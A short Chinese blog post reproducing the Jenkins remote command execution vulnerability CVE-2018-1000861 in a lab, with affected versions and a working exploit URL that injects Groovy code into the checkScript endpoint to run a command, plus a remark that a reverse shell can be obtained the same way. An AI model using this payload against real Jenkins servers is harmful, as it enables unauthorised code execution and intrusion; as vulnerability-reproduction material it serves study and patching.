Jenkins远程命令执行漏洞(CVE-2018-1000861)

漏洞介绍

Stapler Web框架中的钉书机/core/src/main/java/org/kohsuke/stapler/MetaClass.java中存在一个代码执行漏洞,攻击者可以使用该方法调用某些方法通过访问并非旨在通过这种方式调用的特制URL来访问Java对象。

影响版本

Jenkins 2.153及更早版本,LTS 2.138.3及更早版本

复现过程

访问有Jenkins远程命令执行漏洞(CVE-2018-1000861)的网站首页

 

 构建特定的url进行命令执行,如在/tmp目录下创建shell文件

http://192.168.222.196:8080/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=public%20class%20x%20{public%20x(){%22touch%20/tmp/shell%22.execute()}}

执行之后可看到没有回显,看一下搭建漏洞环境的主机/tmp目录下成功创建shell文件

 

 

注意:可执行反弹shell的命令getshell

 

posted @ 2020-09-24 20:20  BruceTyler  阅读(2598)  评论(0)    收藏  举报